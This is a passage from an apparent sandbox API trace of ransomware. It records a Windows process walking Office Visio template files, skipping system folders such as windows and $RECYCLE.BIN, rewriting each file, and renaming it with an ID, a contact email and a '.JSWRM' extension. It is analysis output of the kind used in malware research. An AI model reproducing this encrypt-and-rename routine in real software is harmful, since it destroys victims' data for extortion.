lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x166f0, lpOverlapped=0x0) returned 1 [0146.367] CloseHandle (hObject=0x314) returned 1 [0146.367] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALOUT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calout_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALOUT_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calout_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.370] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37cb5a6, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x37cb5a6, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x37f171b, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x155f9, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CALOUT_U.VSSX", cAlternateFileName="CALOUT~2.VSS")) returned 1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2=".") returned 1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="..") returned 1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="...") returned 1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="windows") returned -1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="recovery") returned -1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="perflogs") returned -1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="documents and settings") returned -1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="system volume information") returned -1 [0146.370] lstrcmpiW (lpString1="CALOUT_U.VSSX", lpString2="msocache") returned -1 [0146.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALOUT_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALOUT_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALOUT_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALOUT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calout_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.372] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=87545) returned 1 [0146.372] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.372] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x155f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x155f0, lpOverlapped=0x0) returned 1 [0146.380] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.380] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x155f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x155f0, lpOverlapped=0x0) returned 1 [0146.381] CloseHandle (hObject=0x314) returned 1 [0146.381] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALOUT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calout_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CALOUT_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\calout_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.412] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x33eb904, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x33eb904, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x33eb904, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8bc8, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CAUSEF_M.VSSX", cAlternateFileName="CAUSEF~2.VSS")) returned 1 [0146.412] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2=".") returned 1 [0146.412] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="..") returned 1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="...") returned 1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="windows") returned -1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="recovery") returned -1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="perflogs") returned -1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="documents and settings") returned -1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="system volume information") returned -1 [0146.413] lstrcmpiW (lpString1="CAUSEF_M.VSSX", lpString2="msocache") returned -1 [0146.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.415] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=35784) returned 1 [0146.415] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.415] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8bc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x8bc0, lpOverlapped=0x0) returned 1 [0146.420] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.420] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8bc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x8bc0, lpOverlapped=0x0) returned 1 [0146.420] CloseHandle (hObject=0x314) returned 1 [0146.421] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.422] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6b9d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CAUSEF_M.VSTX", cAlternateFileName="CAUSEF~1.VST")) returned 1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2=".") returned 1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="..") returned 1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="...") returned 1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="windows") returned -1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="recovery") returned -1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="perflogs") returned -1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="documents and settings") returned -1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="system volume information") returned -1 [0146.422] lstrcmpiW (lpString1="CAUSEF_M.VSTX", lpString2="msocache") returned -1 [0146.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.424] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=27549) returned 1 [0146.424] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.424] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6b90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6b90, lpOverlapped=0x0) returned 1 [0146.427] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.427] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6b90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6b90, lpOverlapped=0x0) returned 1 [0146.428] CloseHandle (hObject=0x314) returned 1 [0146.428] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.431] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3163050, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3163050, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3163050, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x873a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CAUSEF_U.VSSX", cAlternateFileName="CAUSEF~1.VSS")) returned 1 [0146.431] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2=".") returned 1 [0146.431] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="..") returned 1 [0146.431] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="...") returned 1 [0146.431] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="windows") returned -1 [0146.431] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="recovery") returned -1 [0146.431] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="perflogs") returned -1 [0146.432] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="documents and settings") returned -1 [0146.432] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.432] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="system volume information") returned -1 [0146.432] lstrcmpiW (lpString1="CAUSEF_U.VSSX", lpString2="msocache") returned -1 [0146.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.432] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.433] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=34618) returned 1 [0146.433] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.433] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8730, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x8730, lpOverlapped=0x0) returned 1 [0146.436] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.437] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8730, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x8730, lpOverlapped=0x0) returned 1 [0146.437] CloseHandle (hObject=0x314) returned 1 [0146.437] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.438] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6a64, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CAUSEF_U.VSTX", cAlternateFileName="CAUSEF~2.VST")) returned 1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2=".") returned 1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="..") returned 1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="...") returned 1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="windows") returned -1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="recovery") returned -1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="perflogs") returned -1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="documents and settings") returned -1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="system volume information") returned -1 [0146.438] lstrcmpiW (lpString1="CAUSEF_U.VSTX", lpString2="msocache") returned -1 [0146.438] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CAUSEF_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CAUSEF_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.440] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=27236) returned 1 [0146.440] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.440] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6a60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6a60, lpOverlapped=0x0) returned 1 [0146.444] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.444] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6a60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6a60, lpOverlapped=0x0) returned 1 [0146.444] CloseHandle (hObject=0x314) returned 1 [0146.444] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CAUSEF_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\causef_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.445] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, 